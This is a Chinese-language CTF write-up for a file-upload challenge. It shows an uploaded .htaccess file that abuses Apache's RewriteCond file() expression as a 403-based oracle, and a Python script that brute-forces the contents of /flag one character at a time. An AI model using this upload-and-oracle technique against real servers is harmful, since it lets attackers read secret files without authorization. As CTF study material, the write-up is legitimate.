这题和上个upload题多了点字符过滤,后端也过滤了几个关键字,上题的.htaccess文件已经用不了了,找了个新的
1
2
3
| RewriteEngine On
RewriteCond expr "file('/flag') =~ /{pattern}.*/"
RewriteRule ^ - [F]
|
要用到Rewrite要先开启引擎,RewriteCond相当于if,^是正则中的在这代表所有,-表示不重定向,[F]返回403,这得意思是如果满足表达式,所有文件返回403
具体介绍可以看这个,https://www.cnblogs.com/sijidou/p/10856450.html
同样先上传个test
然后上传.htaccess,判断flag内容开头是否是UniCTF
返回403代表成功了
判断flag内容开头是否是UniCF
这就直接写脚本了
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
| import requests
import string
url = "http://80-b70977a2-3919-462d-a4b2-b68afe57ba69.challenge.ctfplus.cn/"
CHAR_LIST = string.ascii_letters + string.digits + "{}_-@!"
def solve():
session = requests.session()
current_flag = "UniCTF"
while True:
found_in_round = False
for char in CHAR_LIST:
pattern = f"{current_flag}{char}"
print(pattern)
htaccess_content = f"""
RewriteEngine On
RewriteCond expr "file('/flag') =~ /{pattern}.*/"
RewriteRule ^ - [F]"""
try:
session.post(url, files={'file': ('.htaccess', htaccess_content.strip())})
r = session.get(url+"upload/test")
if r.status_code == 403:
current_flag += char
found_in_round = True
if char == "}": return
break
except Exception as e:
print(f"Error: {e}")
continue
if not found_in_round:
break
if __name__ == "__main__":
requests.post(url,files={'file': ("test","test")})
solve()
|
